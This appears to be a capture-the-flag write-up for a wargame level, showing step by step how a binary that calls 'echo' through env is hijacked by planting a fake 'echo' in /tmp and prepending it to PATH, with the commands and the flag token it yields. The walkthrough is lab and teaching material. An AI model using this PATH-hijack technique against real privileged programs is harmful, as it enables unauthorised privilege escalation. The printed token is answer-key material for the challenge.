## Level 02

### First step

```bash
$> strings level03
...
$> /usr/bin/env echo Exploit me
...
```

If this string is called in any way, we can execute anything we want. Just fake the echo

### Second step

 - Create a file which calls the utils getflag
 - Name it echo

```bash
$> echo /bin/getflag > /tmp/echo; chmod 755 /tmp/echo
```

### Last step :: Evil laugh

```bash
$> PATH=/tmp:$PATH ./level03
Check flag.Here is your token : qi0maab88jeaj46qoumi7maus
:trollface:
```